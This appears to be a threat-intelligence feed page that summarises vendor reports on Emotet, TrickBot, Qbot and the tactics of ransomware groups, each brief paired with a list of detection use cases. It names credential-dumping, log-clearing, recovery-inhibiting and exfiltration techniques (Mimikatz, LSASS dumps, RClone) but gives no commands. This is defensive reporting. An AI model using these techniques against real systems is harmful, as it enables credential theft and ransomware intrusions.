Ransomware Attack Techniques

May 03, 2022

Ransomware Attack Techniques

Industry: N/A | Level: Tactical | Source: Symantec

Symantec’s analysis of ransomware groups Hive, Conti, and Avoslocker, have identified frequently utilized tools, tactics, and procedures (TTPs). During the initial access stage of the attack, the ransomware operators leverage exploits, RDP from weak or compromised credentials, and malware deployment through phishing emails involving IcedID, Emotet, QakBot, or TrickBot. Persistence involved the use of third-party remote software such as AnyDesk and ConnectWise Control along with modifications to the firewall and registry. Tools used for system discovery include ADRecon and Netscan. Credential access is achieved with a vast array of techniques involving Mimikatz, comsvcs.dll, extracting credentials from the registry, and using task manager to dump LSASS memory. Tools used for lateral movement includes PsExec, WMI, BITSAdmin, and Mimikatz. The tampering of Windows logs helped cover the attacker’s tracks. Data recovery is inhibited by deleting shadow copies. Lastly, for data exfiltration, actors relied on RClone and FileZilla to transfer data.

  • Anvilogic Use Cases:
    • Registry key added with reg.exe
    • Windows Firewall Rule Creation
    • Mimikatz
    • Invoke-Expression Command
    • comsvcs.dll Lsass Memory Dump
    • Rundll32 Command Line
    • Task Manager lsass Dump
    • Credentials in Registry
    • Remote Admin Tools
    • WinRM Tools
    • BITSadmin Execution
    • Clear Windows Event Logs
    • Inhibit System Recovery Commands
    • Suspicious Registry Key Deleted
    • Rclone Execution

Red Canary’s Intelligence Insights

May 03, 2022

Red Canary’s Intelligence Insights

Industry: N/A | Level: Tactical | Source: RedCanary

Red Canary’s intelligence insights of threats observed during March 2022 have identified a shift in rankings. SocGholish, previously the top threat slipping to number #8 on the list and Impacket claiming the top spot. The top five threat rankings (highest to least) include Impacket, Mimikatz, Yellow Cockatoo, Cobalt Strike, and BloodHound. Additionally, Emotet has risen on the threat list to the 6th spot (previously #8, and Qbot/Qakbot has dropped to 9th (previously #4)). The Qbot malware was observed in April 2022, adjusting it’s delivery techniques to now incorporate Windows Installer (MSI) packages, when previously utilizing malicious office macros and compressed zip files. Microsoft’s decision to block VBA macros by default, since January 2022, has caused threat actors to adjust.

  • Anvilogic Use Cases:
    • Suspicious Email Attachment
    • Compressed File Execution
    • MSIExec Install MSI File

Catching Up With Emotet

April 26, 2022

Catching Up With Emotet

Industry: N/A | Level: Tactical | Source: Fortinet

Fortinet reviewed activity from Emotet campaigns through the delivery of malicious documents using a variety of attack techniques. Since the malware’s reemergence in November 202, it has been highly active. However, activity has slightly tapered potentially due to Microsoft disabling Excel 4.0 macro by default in January 2022. Analysis of five malicious document samples has identified the use of Excel or a Word document containing either malicious VBA macro or Excel 4.0 macro to deliver Emotet. The execution following the malware typically utilizes wscript, PowerShell, or Mshta to download the Emotet payload. Following its download, the malware would be executed with rundll32 or regsvr32.

  • Anvilogic Scenario: Emotet Behaviors
  • Anvilogic Use Cases:
    • Malicious Document Execution
    • Compressed File Execution
    • Wscript/Cscript Execution
    • Invoke-WebRequest Command
    • Suspicious File written to Disk
    • regsvr32 Execution
    • Rundll32 Command Line

IRS Themed Phishing with Emotet

March 22, 2022

IRS Themed Phishing with Emotet

Industry: N/A | Level: Tactical | Source: Cofense

In the spirit of the U.S. 2022 tax season, Emotet has tailoring its latest phishing campaign to the financial event. Cofense Intelligence has repeatedly identified Emotet using this particular theme in past years, masquerading as the Internal Revenue Service (IRS) to lure victims into opening an attached zip file containing a malicious document. The document if executed drops the Emotet .dll file onto the victim’s workstation.

  • Anvilogic Use Cases:
    • Compressed File Execution
    • Malicious Document Execution
    • Suspicious File written to Disk

Emotet Surges in Japan

March 15, 2022

Emotet Surges in Japan

Industry: N/A | Level: Tactical | Source: Cybereason

Cybereason’s tracking of Emotet malware in the first quarter of 2022, has identified a surge of Emotet activity against Japanese organizations. Emotet’s distribution has been identified through malicious Excel documents that downloads the malware upon execution. The malware uses regsvr32 to execute a malicious DLL file however it also uses a .ocx file extension. Events following, involve the malware establishing persistence in the registry and conducting reconnaissance activity. Cybereason noticed Emotet in it’s current attacks has not utilized PowerShell for deployment.

  • Anvilogic Scenarios:
    • Emotet Behaviors
    • Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • Malicious Document Execution
    • regsvr32 Execution
    • New AutoRun Registry Key
    • Common Reconnaissance Commands

Trickbot Mystery

March 01, 2022

Trickbot Mystery

Industry: N/A | Level: Strategic | Source: Intel471

Corresponding with AdvIntel’s reports of fading Trickbot activity, Intel471 also reports the noticeably dormant activity from the notorious malware, as no new Trickbot campaigns have been observed in the 2022 year. Tracking of Trickbot campaigns has only identified three during the month of December 2021 with the latest campaign occurring on December 28th, 2021. The activity from December is lower than the eight identified in November 2021. In addition, Intel471 observes a lack of updates to “onboard malware configuration files (mcconf), which contain a list of controller addresses the bot can connect to.” The drop in Trickbot activity is theorized to be due to a shift in operations in favor of Emotet. The lack of Trickbot activity is not a sign the malware operations are dead as its command and control infrastructure remains active. Associated malware to Trickbot such as Emotet, Bazar and Bokbot should be closely monitored especially as they are closely tied to ransomware deployments such as Conti.

Emotet Changes Infection Tactic

February 22, 2022

Emotet Changes Infection Tactic

Industry: N/A | Level: Tactical | Source: Unit42

Tracking of prolific malware, Emotet by Palo Alto Unit42, has identified a new infected attack method utilized by the malware. Starting with phishing emails containing a hijacked email thread, “The new attack delivers an Excel file through email, and the document contains an obfuscated Excel 4.0 macro. When the macro is activated, it downloads and executes an HTML application that downloads two stages of PowerShell to retrieve and execute the final Emotet payload.” Since the malware’s resurgence in November 2021, it has used a variety of techniques for its distribution, mostly involving email attachments as well as masquerading as an Adobe Windows App Installer Package.

  • Anvilogic Scenario: Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • Compressed File Execution
    • MSHTA.exe execution

Cybereason Threat Analysis Report

February 15, 2022

Cybereason’s Global Security Operations Center Team (GSOC) provides a threat analysis report detailing comprehensive attack scenarios from malware loaders IcedID, QBot, and Emotet that lead to compromises with Cobalt Strike.

Emotet and App Installer

December 01, 2021

Emotet and App Installer

Industry: N/A | Level: Tactical | Sources: Twitter – @malware_traffic & BleepingComputer

Sophos reported on November 11th 2021, Emotet malware is following the same tactics utilized by Bazarloader for abusing the Windows App Installer packages, says twitter security researcher @malware_traffic. The attack chain starts with an email from a stolen reply chain with a URL link to an alleged PDF document. The link leads to a Google Drive styled page where a download will occur for a file hosted on Microsoft Azure URLs at .web.core.windows.net. Following the install of an alleged Adobe PDF component, a DLL file will be downloaded to the %Temp% folder and executed with rundll32, additionally an autorun entry gets created.

  • Anvilogic Scenario: Malware & AppInstaller
  • Anvilogic Use Cases:
    • AppInstaller.exe Download
    • New AutoRun Registry Key

Why the Emotet Resurgence by AdvIntel

November 21, 2021

Why the Emotet Resurgence by AdvIntel

Industry: N/A | Level: Strategic | Source: AdvIntel

Researchers at AdvIntel observed November 14th, 2021, a resurgence of Emotet and postulates it being the result of, “unfulfilled loader commodity demand, decline of the decentralized RaaS (Ransomware-as-a-Service) model, and the return of the monopoly of organized crime syndicates such as Conti.” Based on AdvIntel’s intelligence tracking, the resurgence appears to have been initiated by a former Ryuk member who convinced a former Emotet operator to rebuild and set up the malware builder. Given the effectiveness of Emotet providing initial access, the prediction is a potential rise/dominance of Conti ransomware. All appear to be motivated by previous successes of an alliance between Emotet, TrickBot, and Ryuk in 2018.